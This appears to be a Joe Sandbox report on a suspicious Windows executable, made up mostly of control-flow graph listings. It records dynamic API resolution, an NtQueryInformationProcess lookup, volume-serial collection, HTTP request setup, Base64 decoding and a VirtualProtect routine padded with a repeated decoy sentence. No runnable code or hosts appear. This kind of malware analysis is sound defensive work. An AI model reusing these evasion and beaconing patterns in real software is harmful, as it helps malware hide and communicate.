14295->14296 14297 b045c0 2 API calls 14296->14297 14298 b035d7 14297->14298 14299 b045c0 2 API calls 14298->14299 14300 b035f0 14299->14300 14301 b045c0 2 API calls 14300->14301 14302 b03609 14301->14302 14303 b045c0 2 API calls 14302->14303 14304 b03622 14303->14304 14305 b045c0 2 API calls 14304->14305 14306 b0363b 14305->14306 14307 b045c0 2 API calls 14306->14307 14308 b03654 14307->14308 14309 b045c0 2 API calls 14308->14309 14310 b0366d 14309->14310 14311 b045c0 2 API calls 14310->14311 14312 b03686 14311->14312 14313 b045c0 2 API calls 14312->14313 14314 b0369f 14313->14314 14315 b045c0 2 API calls 14314->14315 14316 b036b8 14315->14316 14317 b045c0 2 API calls 14316->14317 14318 b036d1 14317->14318 14319 b045c0 2 API calls 14318->14319 14320 b036ea 14319->14320 14321 b045c0 2 API calls 14320->14321 14322 b03703 14321->14322 14323 b045c0 2 API calls 14322->14323 14324 b0371c 14323->14324 14325 b045c0 2 API calls 14324->14325 14326 b03735 14325->14326 14327 b045c0 2 API calls 14326->14327 14328 b0374e 14327->14328 14329 b045c0 2 API calls 14328->14329 14330 b03767 14329->14330 14331 b045c0 2 API calls 14330->14331 14332 b03780 14331->14332 14333 b045c0 2 API calls 14332->14333 14334 b03799 14333->14334 14335 b045c0 2 API calls 14334->14335 14336 b037b2 14335->14336 14337 b045c0 2 API calls 14336->14337 14338 b037cb 14337->14338 14339 b045c0 2 API calls 14338->14339 14340 b037e4 14339->14340 14341 b045c0 2 API calls 14340->14341 14342 b037fd 14341->14342 14343 b045c0 2 API calls 14342->14343 14344 b03816 14343->14344 14345 b045c0 2 API calls 14344->14345 14346 b0382f 14345->14346 14347 b045c0 2 API calls 14346->14347 14348 b03848 14347->14348 14349 b045c0 2 API calls 14348->14349 14350 b03861 14349->14350 14351 b045c0 2 API calls 14350->14351 14352 b0387a 14351->14352 14353 b045c0 2 API calls 14352->14353 14354 b03893 14353->14354 14355 b045c0 2 API calls 14354->14355 14356 b038ac 14355->14356 14357 b045c0 2 API calls 14356->14357 14358 b038c5 14357->14358 
14359 b045c0 2 API calls 14358->14359 14360 b038de 14359->14360 14361 b045c0 2 API calls 14360->14361 14362 b038f7 14361->14362 14363 b045c0 2 API calls 14362->14363 14364 b03910 14363->14364 14365 b045c0 2 API calls 14364->14365 14366 b03929 14365->14366 14367 b045c0 2 API calls 14366->14367 14368 b03942 14367->14368 14369 b045c0 2 API calls 14368->14369 14370 b0395b 14369->14370 14371 b045c0 2 API calls 14370->14371 14372 b03974 14371->14372 14373 b045c0 2 API calls 14372->14373 14374 b0398d 14373->14374 14375 b045c0 2 API calls 14374->14375 14376 b039a6 14375->14376 14377 b045c0 2 API calls 14376->14377 14378 b039bf 14377->14378 14379 b045c0 2 API calls 14378->14379 14380 b039d8 14379->14380 14381 b045c0 2 API calls 14380->14381 14382 b039f1 14381->14382 14383 b045c0 2 API calls 14382->14383 14384 b03a0a 14383->14384 14385 b045c0 2 API calls 14384->14385 14386 b03a23 14385->14386 14387 b045c0 2 API calls 14386->14387 14388 b03a3c 14387->14388 14389 b045c0 2 API calls 14388->14389 14390 b03a55 14389->14390 14391 b045c0 2 API calls 14390->14391 14392 b03a6e 14391->14392 14393 b045c0 2 API calls 14392->14393 14394 b03a87 14393->14394 14395 b045c0 2 API calls 14394->14395 14396 b03aa0 14395->14396 14397 b045c0 2 API calls 14396->14397 14398 b03ab9 14397->14398 14399 b045c0 2 API calls 14398->14399 14400 b03ad2 14399->14400 14401 b045c0 2 API calls 14400->14401 14402 b03aeb 14401->14402 14403 b045c0 2 API calls 14402->14403 14404 b03b04 14403->14404 14405 b045c0 2 API calls 14404->14405 14406 b03b1d 14405->14406 14407 b045c0 2 API calls 14406->14407 14408 b03b36 14407->14408 14409 b045c0 2 API calls 14408->14409 14410 b03b4f 14409->14410 14411 b045c0 2 API calls 14410->14411 14412 b03b68 14411->14412 14413 b045c0 2 API calls 14412->14413 14414 b03b81 14413->14414 14415 b045c0 2 API calls 14414->14415 14416 b03b9a 14415->14416 14417 b045c0 2 API calls 14416->14417 14418 b03bb3 14417->14418 14419 b045c0 2 API calls 14418->14419 14420 b03bcc 14419->14420 14421 b045c0 2 
API calls 14420->14421 14422 b03be5 14421->14422 14423 b045c0 2 API calls 14422->14423 14424 b03bfe 14423->14424 14425 b045c0 2 API calls 14424->14425 14426 b03c17 14425->14426 14427 b045c0 2 API calls 14426->14427 14428 b03c30 14427->14428 14429 b045c0 2 API calls 14428->14429 14430 b03c49 14429->14430 14431 b045c0 2 API calls 14430->14431 14432 b03c62 14431->14432 14433 b045c0 2 API calls 14432->14433 14434 b03c7b 14433->14434 14435 b045c0 2 API calls 14434->14435 14436 b03c94 14435->14436 14437 b045c0 2 API calls 14436->14437 14438 b03cad 14437->14438 14439 b045c0 2 API calls 14438->14439 14440 b03cc6 14439->14440 14441 b045c0 2 API calls 14440->14441 14442 b03cdf 14441->14442 14443 b045c0 2 API calls 14442->14443 14444 b03cf8 14443->14444 14445 b045c0 2 API calls 14444->14445 14446 b03d11 14445->14446 14447 b045c0 2 API calls 14446->14447 14448 b03d2a 14447->14448 14449 b045c0 2 API calls 14448->14449 14450 b03d43 14449->14450 14451 b045c0 2 API calls 14450->14451 14452 b03d5c 14451->14452 14453 b045c0 2 API calls 14452->14453 14454 b03d75 14453->14454 14455 b045c0 2 API calls 14454->14455 14456 b03d8e 14455->14456 14457 b045c0 2 API calls 14456->14457 14458 b03da7 14457->14458 14459 b045c0 2 API calls 14458->14459 14460 b03dc0 14459->14460 14461 b045c0 2 API calls 14460->14461 14462 b03dd9 14461->14462 14463 b045c0 2 API calls 14462->14463 14464 b03df2 14463->14464 14465 b045c0 2 API calls 14464->14465 14466 b03e0b 14465->14466 14467 b045c0 2 API calls 14466->14467 14468 b03e24 14467->14468 14469 b045c0 2 API calls 14468->14469 14470 b03e3d 14469->14470 14471 b045c0 2 API calls 14470->14471 14472 b03e56 14471->14472 14473 b045c0 2 API calls 14472->14473 14474 b03e6f 14473->14474 14475 b045c0 2 API calls 14474->14475 14476 b03e88 14475->14476 14477 b045c0 2 API calls 14476->14477 14478 b03ea1 14477->14478 14479 b045c0 2 API calls 14478->14479 14480 b03eba 14479->14480 14481 b045c0 2 API calls 14480->14481 14482 b03ed3 14481->14482 14483 b045c0 2 API calls 
14482->14483 14484 b03eec 14483->14484 14485 b045c0 2 API calls 14484->14485 14486 b03f05 14485->14486 14487 b045c0 2 API calls 14486->14487 14488 b03f1e 14487->14488 14489 b045c0 2 API calls 14488->14489 14490 b03f37 14489->14490 14491 b045c0 2 API calls 14490->14491 14492 b03f50 14491->14492 14493 b045c0 2 API calls 14492->14493 14494 b03f69 14493->14494 14495 b045c0 2 API calls 14494->14495 14496 b03f82 14495->14496 14497 b045c0 2 API calls 14496->14497 14498 b03f9b 14497->14498 14499 b045c0 2 API calls 14498->14499 14500 b03fb4 14499->14500 14501 b045c0 2 API calls 14500->14501 14502 b03fcd 14501->14502 14503 b045c0 2 API calls 14502->14503 14504 b03fe6 14503->14504 14505 b045c0 2 API calls 14504->14505 14506 b03fff 14505->14506 14507 b045c0 2 API calls 14506->14507 14508 b04018 14507->14508 14509 b045c0 2 API calls 14508->14509 14510 b04031 14509->14510 14511 b045c0 2 API calls 14510->14511 14512 b0404a 14511->14512 14513 b045c0 2 API calls 14512->14513 14514 b04063 14513->14514 14515 b045c0 2 API calls 14514->14515 14516 b0407c 14515->14516 14517 b045c0 2 API calls 14516->14517 14518 b04095 14517->14518 14519 b045c0 2 API calls 14518->14519 14520 b040ae 14519->14520 14521 b045c0 2 API calls 14520->14521 14522 b040c7 14521->14522 14523 b045c0 2 API calls 14522->14523 14524 b040e0 14523->14524 14525 b045c0 2 API calls 14524->14525 14526 b040f9 14525->14526 14527 b045c0 2 API calls 14526->14527 14528 b04112 14527->14528 14529 b045c0 2 API calls 14528->14529 14530 b0412b 14529->14530 14531 b045c0 2 API calls 14530->14531 14532 b04144 14531->14532 14533 b045c0 2 API calls 14532->14533 14534 b0415d 14533->14534 14535 b045c0 2 API calls 14534->14535 14536 b04176 14535->14536 14537 b045c0 2 API calls 14536->14537 14538 b0418f 14537->14538 14539 b045c0 2 API calls 14538->14539 14540 b041a8 14539->14540 14541 b045c0 2 API calls 14540->14541 14542 b041c1 14541->14542 14543 b045c0 2 API calls 14542->14543 14544 b041da 14543->14544 14545 b045c0 2 API calls 14544->14545 
14546 b041f3 14545->14546 14547 b045c0 2 API calls 14546->14547 14548 b0420c 14547->14548 14549 b045c0 2 API calls 14548->14549 14550 b04225 14549->14550 14551 b045c0 2 API calls 14550->14551 14552 b0423e 14551->14552 14553 b045c0 2 API calls 14552->14553 14554 b04257 14553->14554 14555 b045c0 2 API calls 14554->14555 14556 b04270 14555->14556 14557 b045c0 2 API calls 14556->14557 14558 b04289 14557->14558 14559 b045c0 2 API calls 14558->14559 14560 b042a2 14559->14560 14561 b045c0 2 API calls 14560->14561 14562 b042bb 14561->14562 14563 b045c0 2 API calls 14562->14563 14564 b042d4 14563->14564 14565 b045c0 2 API calls 14564->14565 14566 b042ed 14565->14566 14567 b045c0 2 API calls 14566->14567 14568 b04306 14567->14568 14569 b045c0 2 API calls 14568->14569 14570 b0431f 14569->14570 14571 b045c0 2 API calls 14570->14571 14572 b04338 14571->14572 14573 b045c0 2 API calls 14572->14573 14574 b04351 14573->14574 14575 b045c0 2 API calls 14574->14575 14576 b0436a 14575->14576 14577 b045c0 2 API calls 14576->14577 14578 b04383 14577->14578 14579 b045c0 2 API calls 14578->14579 14580 b0439c 14579->14580 14581 b045c0 2 API calls 14580->14581 14582 b043b5 14581->14582 14583 b045c0 2 API calls 14582->14583 14584 b043ce 14583->14584 14585 b045c0 2 API calls 14584->14585 14586 b043e7 14585->14586 14587 b045c0 2 API calls 14586->14587 14588 b04400 14587->14588 14589 b045c0 2 API calls 14588->14589 14590 b04419 14589->14590 14591 b045c0 2 API calls 14590->14591 14592 b04432 14591->14592 14593 b045c0 2 API calls 14592->14593 14594 b0444b 14593->14594 14595 b045c0 2 API calls 14594->14595 14596 b04464 14595->14596 14597 b045c0 2 API calls 14596->14597 14598 b0447d 14597->14598 14599 b045c0 2 API calls 14598->14599 14600 b04496 14599->14600 14601 b045c0 2 API calls 14600->14601 14602 b044af 14601->14602 14603 b045c0 2 API calls 14602->14603 14604 b044c8 14603->14604 14605 b045c0 2 API calls 14604->14605 14606 b044e1 14605->14606 14607 b045c0 2 API calls 14606->14607 14608 b044fa 
14607->14608 14609 b045c0 2 API calls 14608->14609 14610 b04513 14609->14610 14611 b045c0 2 API calls 14610->14611 14612 b0452c 14611->14612 14613 b045c0 2 API calls 14612->14613 14614 b04545 14613->14614 14615 b045c0 2 API calls 14614->14615 14616 b0455e 14615->14616 14617 b045c0 2 API calls 14616->14617 14618 b04577 14617->14618 14619 b045c0 2 API calls 14618->14619 14620 b04590 14619->14620 14621 b045c0 2 API calls 14620->14621 14622 b045a9 14621->14622 14623 b19c10 14622->14623 14624 b19c20 43 API calls 14623->14624 14625 b1a036 8 API calls 14623->14625 14624->14625 14626 b1a146 14625->14626 14627 b1a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14625->14627 14628 b1a153 8 API calls 14626->14628 14629 b1a216 14626->14629 14627->14626 14628->14629 14630 b1a298 14629->14630 14631 b1a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14629->14631 14632 b1a2a5 6 API calls 14630->14632 14633 b1a337 14630->14633 14631->14630 14632->14633 14634 b1a344 9 API calls 14633->14634 14635 b1a41f 14633->14635 14634->14635 14636 b1a4a2 14635->14636 14637 b1a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14635->14637 14638 b1a4ab GetProcAddress GetProcAddress 14636->14638 14639 b1a4dc 14636->14639 14637->14636 14638->14639 14640 b1a515 14639->14640 14641 b1a4e5 GetProcAddress GetProcAddress 14639->14641 14642 b1a612 14640->14642 14643 b1a522 10 API calls 14640->14643 14641->14640 14644 b1a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14642->14644 14645 b1a67d 14642->14645 14643->14642 14644->14645 14646 b1a686 GetProcAddress 14645->14646 14647 b1a69e 14645->14647 14646->14647 14648 b1a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14647->14648 14649 b15ca3 14647->14649 14648->14649 14650 b01590 14649->14650 15771 b01670 14650->15771 14653 b1a7a0 lstrcpy 14654 b015b5 14653->14654 14655 b1a7a0 lstrcpy 14654->14655 14656 b015c7 14655->14656 14657 b1a7a0 
lstrcpy 14656->14657 14658 b015d9 14657->14658 14659 b1a7a0 lstrcpy 14658->14659 14660 b01663 14659->14660 14661 b15510 14660->14661 14662 b15521 14661->14662 14663 b1a820 2 API calls 14662->14663 14664 b1552e 14663->14664 14665 b1a820 2 API calls 14664->14665 14666 b1553b 14665->14666 14667 b1a820 2 API calls 14666->14667 14668 b15548 14667->14668 14669 b1a740 lstrcpy 14668->14669 14670 b15555 14669->14670 14671 b1a740 lstrcpy 14670->14671 14672 b15562 14671->14672 14673 b1a740 lstrcpy 14672->14673 14674 b1556f 14673->14674 14675 b1a740 lstrcpy 14674->14675 14715 b1557c 14675->14715 14676 b1a740 lstrcpy 14676->14715 14677 b15643 StrCmpCA 14677->14715 14678 b156a0 StrCmpCA 14679 b157dc 14678->14679 14678->14715 14680 b1a8a0 lstrcpy 14679->14680 14681 b157e8 14680->14681 14682 b1a820 2 API calls 14681->14682 14684 b157f6 14682->14684 14683 b1a820 lstrlen lstrcpy 14683->14715 14686 b1a820 2 API calls 14684->14686 14685 b15856 StrCmpCA 14687 b15991 14685->14687 14685->14715 14689 b15805 14686->14689 14688 b1a8a0 lstrcpy 14687->14688 14691 b1599d 14688->14691 14692 b01670 lstrcpy 14689->14692 14690 b01590 lstrcpy 14690->14715 14693 b1a820 2 API calls 14691->14693 14714 b15811 14692->14714 14695 b159ab 14693->14695 14694 b151f0 20 API calls 14694->14715 14697 b1a820 2 API calls 14695->14697 14696 b15a0b StrCmpCA 14698 b15a16 Sleep 14696->14698 14699 b15a28 14696->14699 14701 b159ba 14697->14701 14698->14715 14702 b1a8a0 lstrcpy 14699->14702 14700 b1a8a0 lstrcpy 14700->14715 14703 b01670 lstrcpy 14701->14703 14704 b15a34 14702->14704 14703->14714 14705 b1a820 2 API calls 14704->14705 14706 b15a43 14705->14706 14708 b1a820 2 API calls 14706->14708 14707 b152c0 25 API calls 14707->14715 14709 b15a52 14708->14709 14711 b01670 lstrcpy 14709->14711 14710 b1578a StrCmpCA 14710->14715 14711->14714 14712 b1a7a0 lstrcpy 14712->14715 14713 b1593f StrCmpCA 14713->14715 14714->13768 14715->14676 14715->14677 14715->14678 14715->14683 14715->14685 14715->14690 14715->14694 
14715->14696 14715->14700 14715->14707 14715->14710 14715->14712 14715->14713 14717 b17553 GetVolumeInformationA 14716->14717 14718 b1754c 14716->14718 14719 b17591 14717->14719 14718->14717 14720 b175fc GetProcessHeap RtlAllocateHeap 14719->14720 14721 b17619 14720->14721 14722 b17628 wsprintfA 14720->14722 14723 b1a740 lstrcpy 14721->14723 14724 b1a740 lstrcpy 14722->14724 14725 b15da7 14723->14725 14724->14725 14725->13789 14727 b1a7a0 lstrcpy 14726->14727 14728 b04899 14727->14728 15780 b047b0 14728->15780 14730 b048a5 14731 b1a740 lstrcpy 14730->14731 14732 b048d7 14731->14732 14733 b1a740 lstrcpy 14732->14733 14734 b048e4 14733->14734 14735 b1a740 lstrcpy 14734->14735 14736 b048f1 14735->14736 14737 b1a740 lstrcpy 14736->14737 14738 b048fe 14737->14738 14739 b1a740 lstrcpy 14738->14739 14740 b0490b InternetOpenA StrCmpCA 14739->14740 14741 b04944 14740->14741 14742 b04ecb InternetCloseHandle 14741->14742 15786 b18b60 14741->15786 14744 b04ee8 14742->14744 15801 b09ac0 CryptStringToBinaryA 14744->15801 14745 b04963 15794 b1a920 14745->15794 14748 b04976 14750 b1a8a0 lstrcpy 14748->14750 14755 b0497f 14750->14755 14751 b1a820 2 API calls 14752 b04f05 14751->14752 14754 b1a9b0 4 API calls 14752->14754 14753 b04f27 ctype 14758 b1a7a0 lstrcpy 14753->14758 14756 b04f1b 14754->14756 14759 b1a9b0 4 API calls 14755->14759 14757 b1a8a0 lstrcpy 14756->14757 14757->14753 14770 b04f57 14758->14770 14760 b049a9 14759->14760 14761 b1a8a0 lstrcpy 14760->14761 14762 b049b2 14761->14762 14763 b1a9b0 4 API calls 14762->14763 14764 b049d1 14763->14764 14765 b1a8a0 lstrcpy 14764->14765 14766 b049da 14765->14766 14767 b1a920 3 API calls 14766->14767 14768 b049f8 14767->14768 14769 b1a8a0 lstrcpy 14768->14769 14771 b04a01 14769->14771 14770->13792 14772 b1a9b0 4 API calls 14771->14772 14773 b04a20 14772->14773 14774 b1a8a0 lstrcpy 14773->14774 14775 b04a29 14774->14775 14776 b1a9b0 4 API calls 14775->14776 14777 b04a48 14776->14777 14778 b1a8a0 lstrcpy 14777->14778 14779 b04a51 
14778->14779 14780 b1a9b0 4 API calls 14779->14780 14781 b04a7d 14780->14781 14782 b1a920 3 API calls 14781->14782 14783 b04a84 14782->14783 14784 b1a8a0 lstrcpy 14783->14784 14785 b04a8d 14784->14785 14786 b04aa3 InternetConnectA 14785->14786 14786->14742 14787 b04ad3 HttpOpenRequestA 14786->14787 14789 b04b28 14787->14789 14790 b04ebe InternetCloseHandle 14787->14790 14791 b1a9b0 4 API calls 14789->14791 14790->14742 14792 b04b3c 14791->14792 14793 b1a8a0 lstrcpy 14792->14793 14794 b04b45 14793->14794 14795 b1a920 3 API calls 14794->14795 14796 b04b63 14795->14796 14797 b1a8a0 lstrcpy 14796->14797 14798 b04b6c 14797->14798 14799 b1a9b0 4 API calls 14798->14799 14800 b04b8b 14799->14800 14801 b1a8a0 lstrcpy 14800->14801 14802 b04b94 14801->14802 14803 b1a9b0 4 API calls 14802->14803 14804 b04bb5 14803->14804 14805 b1a8a0 lstrcpy 14804->14805 14806 b04bbe 14805->14806 14807 b1a9b0 4 API calls 14806->14807 14808 b04bde 14807->14808 14809 b1a8a0 lstrcpy 14808->14809 14810 b04be7 14809->14810 14811 b1a9b0 4 API calls 14810->14811 14812 b04c06 14811->14812 14813 b1a8a0 lstrcpy 14812->14813 14814 b04c0f 14813->14814 14815 b1a920 3 API calls 14814->14815 14816 b04c2d 14815->14816 14817 b1a8a0 lstrcpy 14816->14817 14818 b04c36 14817->14818 14819 b1a9b0 4 API calls 14818->14819 14820 b04c55 14819->14820 14821 b1a8a0 lstrcpy 14820->14821 14822 b04c5e 14821->14822 14823 b1a9b0 4 API calls 14822->14823 14824 b04c7d 14823->14824 14825 b1a8a0 lstrcpy 14824->14825 14826 b04c86 14825->14826 14827 b1a920 3 API calls 14826->14827 14828 b04ca4 14827->14828 14829 b1a8a0 lstrcpy 14828->14829 14830 b04cad 14829->14830 14831 b1a9b0 4 API calls 14830->14831 14832 b04ccc 14831->14832 14833 b1a8a0 lstrcpy 14832->14833 14834 b04cd5 14833->14834 14835 b1a9b0 4 API calls 14834->14835 14836 b04cf6 14835->14836 14837 b1a8a0 lstrcpy 14836->14837 14838 b04cff 14837->14838 14839 b1a9b0 4 API calls 14838->14839 14840 b04d1f 14839->14840 14841 b1a8a0 lstrcpy 14840->14841 14842 b04d28 14841->14842 

                  Control-flow Graph

                  control_flow_graph 660 b19860-b19874 call b19750 663 b19a93-b19af2 LoadLibraryA * 5 660->663 664 b1987a-b19a8e call b19780 GetProcAddress * 21 660->664 666 b19af4-b19b08 GetProcAddress 663->666 667 b19b0d-b19b14 663->667 664->663 666->667 669 b19b46-b19b4d 667->669 670 b19b16-b19b41 GetProcAddress * 2 667->670 671 b19b68-b19b6f 669->671 672 b19b4f-b19b63 GetProcAddress 669->672 670->669 673 b19b71-b19b84 GetProcAddress 671->673 674 b19b89-b19b90 671->674 672->671 673->674 675 b19bc1-b19bc2 674->675 676 b19b92-b19bbc GetProcAddress * 2 674->676 676->675
                  APIs
                  • GetProcAddress.KERNEL32(75900000,011F06C0), ref: 00B198A1
                  • GetProcAddress.KERNEL32(75900000,011F0708), ref: 00B198BA
                  • GetProcAddress.KERNEL32(75900000,011F0720), ref: 00B198D2
                  • GetProcAddress.KERNEL32(75900000,011F07F8), ref: 00B198EA
                  • GetProcAddress.KERNEL32(75900000,011F0558), ref: 00B19903
                  • GetProcAddress.KERNEL32(75900000,011F8950), ref: 00B1991B
                  • GetProcAddress.KERNEL32(75900000,011E6580), ref: 00B19933
                  • GetProcAddress.KERNEL32(75900000,011E65A0), ref: 00B1994C
                  • GetProcAddress.KERNEL32(75900000,011F0570), ref: 00B19964
                  • GetProcAddress.KERNEL32(75900000,011F0588), ref: 00B1997C
                  • GetProcAddress.KERNEL32(75900000,011F05A0), ref: 00B19995
                  • GetProcAddress.KERNEL32(75900000,011F05B8), ref: 00B199AD
                  • GetProcAddress.KERNEL32(75900000,011E6500), ref: 00B199C5
                  • GetProcAddress.KERNEL32(75900000,011F05D0), ref: 00B199DE
                  • GetProcAddress.KERNEL32(75900000,011F0618), ref: 00B199F6
                  • GetProcAddress.KERNEL32(75900000,011E62A0), ref: 00B19A0E
                  • GetProcAddress.KERNEL32(75900000,011F0648), ref: 00B19A27
                  • GetProcAddress.KERNEL32(75900000,011F08E8), ref: 00B19A3F
                  • GetProcAddress.KERNEL32(75900000,011E6640), ref: 00B19A57
                  • GetProcAddress.KERNEL32(75900000,011F0918), ref: 00B19A70
                  • GetProcAddress.KERNEL32(75900000,011E63C0), ref: 00B19A88
                  • LoadLibraryA.KERNEL32(011F08A0,?,00B16A00), ref: 00B19A9A
                  • LoadLibraryA.KERNEL32(011F0900,?,00B16A00), ref: 00B19AAB
                  • LoadLibraryA.KERNEL32(011F08D0,?,00B16A00), ref: 00B19ABD
                  • LoadLibraryA.KERNEL32(011F0858,?,00B16A00), ref: 00B19ACF
                  • LoadLibraryA.KERNEL32(011F0870,?,00B16A00), ref: 00B19AE0
                  • GetProcAddress.KERNEL32(75070000,011F08B8), ref: 00B19B02
                  • GetProcAddress.KERNEL32(75FD0000,011F0888), ref: 00B19B23
                  • GetProcAddress.KERNEL32(75FD0000,011F8F40), ref: 00B19B3B
                  • GetProcAddress.KERNEL32(75A50000,011F8EF8), ref: 00B19B5D
                  • GetProcAddress.KERNEL32(74E50000,011E6420), ref: 00B19B7E
                  • GetProcAddress.KERNEL32(76E80000,011F8900), ref: 00B19B9F
                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00B19BB6
                  Strings
                  • NtQueryInformationProcess, xrefs: 00B19BAA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: NtQueryInformationProcess
                  • API String ID: 2238633743-2781105232
                  • Opcode ID: 12a9981547a7f80e5f6666add7eb6e99a53ea6e03ac873c1eb85af8086b3bcb6
                  • Instruction ID: af4a29b2f3b86f6fb59ddd64369392a37438fefe44736da40725e0db3a90e798
                  • Opcode Fuzzy Hash: 12a9981547a7f80e5f6666add7eb6e99a53ea6e03ac873c1eb85af8086b3bcb6
                  • Instruction Fuzzy Hash: 7CA12ABE5C43409FE364EFACED88A663BF9F74E301714451AA609C3364D639A841DB72

                  Control-flow Graph

                  control_flow_graph 764 b045c0-b04695 RtlAllocateHeap 781 b046a0-b046a6 764->781 782 b046ac-b0474a 781->782 783 b0474f-b047a9 VirtualProtect 781->783 782->781
                  APIs
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0460F
                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B0479C
                  Strings
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045DD, 00B04622, 00B0462D, 00B04643, 00B04657, 00B04662, 00B04678, 00B04683, 00B046CD, 00B04713, 00B04729, 00B04734, 00B0473F, 00B0474F, 00B0475A
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046AC
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045E8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045F3
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0471E
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0477B
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04617
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046B7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B045C7
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046C2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B0466D
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B046D8
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04770
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00B04765
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 